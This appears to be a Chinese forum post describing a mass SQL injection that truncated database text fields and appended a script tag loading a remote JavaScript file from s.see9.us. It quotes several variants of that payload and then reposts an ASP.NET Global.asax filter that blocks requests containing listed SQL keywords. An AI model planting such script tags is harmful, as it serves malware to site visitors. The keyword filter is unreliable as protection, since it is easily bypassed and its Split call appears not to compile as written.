症状:

五一后,大量网站被攻击,数据库（一个是MS SQL 2000，一个是MS SQL 2005）某些表的某些文本字段所有数据记录都被截掉剩留几个文字，并被附加上了如下略有变化的文本字符：
"> </title> <script src=http://s.see9.us/s.js> </script> <!--
"> </title> <script""> </title> <script src=http://s.see9.us/s.js> </script> <!--
"> </title> <script s"> </title> <script src=http://s.see9.us/s.js> </script> <!--
"> </title> <script src=ht"> </title> <script src=http://s.see9.us/s.js> </script> <!--
"> </title> <sc"> </title> <script src=http://s.see9.us/s.js> </script> <!--
"> </title> <script src=http://s"> </title> <script src=http://s.see9.us/s.js> </script> <!--
暂时解决方法:

用下面的这种方法暂时解决了，目前为止没有再出现插入了

转： 在Global.asax文件下面加入如下代码： 希望能管用.针对.net 


 void Application_BeginRequest(Object sender, EventArgs e)  
    {  
        StartProcessRequest();  

    }  

    #region SQL注入式攻击代码分析  
    ///    <summary>  
    /// 处理用户提交的请求  
    ///    </summary>  
    private void StartProcessRequest()  
    {  
        try  
        {  
            string getkeys = "";  
            string sqlErrorPage = "../default.aspx";//转向的错误提示页面  
            if (System.Web.HttpContext.Current.Request.QueryString != null)  
            {  

                for (int i = 0; i    < System.Web.HttpContext.Current.Request.QueryString.Count; i++)  
                {  
                    getkeys = System.Web.HttpContext.Current.Request.QueryString.Keys[i];  
                    if (!ProcessSqlStr(System.Web.HttpContext.Current.Request.QueryString[getkeys]))  
                    {  
                        System.Web.HttpContext.Current.Response.Redirect(sqlErrorPage);  
                        System.Web.HttpContext.Current.Response.End();  
                    }  
                }  
            }  
            if (System.Web.HttpContext.Current.Request.Form != null)  
            {  
                for (int i = 0; i    < System.Web.HttpContext.Current.Request.Form.Count; i++)  
                {  
                    getkeys = System.Web.HttpContext.Current.Request.Form.Keys[i];  
                    if (getkeys == "__VIEWSTATE") continue;  
                    if (!ProcessSqlStr(System.Web.HttpContext.Current.Request.Form[getkeys]))  
                    {  
                        System.Web.HttpContext.Current.Response.Redirect(sqlErrorPage);  
                        System.Web.HttpContext.Current.Response.End();  
                    }  
                }  
            }  
        }  
        catch  
        {  
            // 错误处理: 处理用户提交信息!  
        }  
    }  
    ///    <summary>  
    /// 分析用户请求是否正常  
    ///    </summary>  
    ///    <param name="Str">传入用户提交数据   </param>  
    ///    <returns>返回是否含有SQL注入式攻击代码   </returns>  
    private bool ProcessSqlStr(string Str)  
    {  
        bool ReturnValue = true;  
        try  
        {  
            if (Str.Trim() != "")  
            {  
                string SqlStr = "and  |exec  |insert  |select  |delete  |update  |count  |*  |chr  |mid  |master  |truncate  |char  |declare";  

                string[] anySqlStr = SqlStr.Split('  |');  
                foreach (string ss in anySqlStr)  
                {  
                    if (Str.ToLower().IndexOf(ss) >= 0)  
                    {  
                        ReturnValue = false;  
                        break;  
                    }  
                }  
            }  
        }  
        catch  
        {  
            ReturnValue = false;  
        }  
        return ReturnValue;  
    }  
    #endregion